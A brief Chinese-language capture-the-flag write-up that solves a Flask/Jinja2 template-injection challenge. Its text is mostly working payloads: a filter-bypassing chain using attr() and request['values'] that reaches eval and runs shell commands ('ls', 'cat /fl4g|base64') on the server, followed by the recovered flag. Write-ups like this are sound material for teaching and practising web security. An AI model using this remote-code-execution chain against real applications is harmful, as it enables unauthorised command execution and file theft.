打开网页提示Hello guest!
访问http://xmctf.top:8906/?name={{7*7}},返回Hello 49!
访问http://xmctf.top:8906/?name={{config}},页面被过滤,尝试发现被过滤的还有args,点,下划线
点可由attr绕过
下划线和args可由request['values']绕过
访问http://xmctf.top:8906/?name={{()|attr(request[%27values%27][%27class%27])|attr(request[%27values%27][%27base%27])|attr(request[%27values%27][%27subclasses%27])()|attr(request[%27values%27][%27getitem%27])(233)|attr(request[%27values%27][%27init%27])|attr(request[%27values%27][%27globals%27])|attr(request[%27values%27][%27getitem%27])(request[%27values%27][%27builtins%27])|attr(request[%27values%27][%27getitem%27])(request[%27values%27][%27eval%27])(request[%27values%27][%27cmd%27])}},同时post如下参数:class=__class__&base=__base__&subclasses=__subclasses__&init=__init__&globals=__globals__&getitem=__getitem__&builtins=__builtins__&eval=eval&cmd=__import__("os").popen("ls").read(),执行成功
将post修改为class=__class__&base=__base__&subclasses=__subclasses__&init=__init__&globals=__globals__&getitem=__getitem__&builtins=__builtins__&eval=eval&cmd=__import__("os").popen("cat /fl4g").read(),被过滤
则修改为class=__class__&base=__base__&subclasses=__subclasses__&init=__init__&globals=__globals__&getitem=__getitem__&builtins=__builtins__&eval=eval&cmd=__import__("os").popen("cat /fl4g|base64").read(),得到flag的base64编码:ZmxhZ3sxMnNkLWp0NGVzZjMtczkzaGNlY2MzLXMzM2ZmM30K
解码获得flag:
flag{12sd-jt4esf3-s93hcecc3-s33ff3}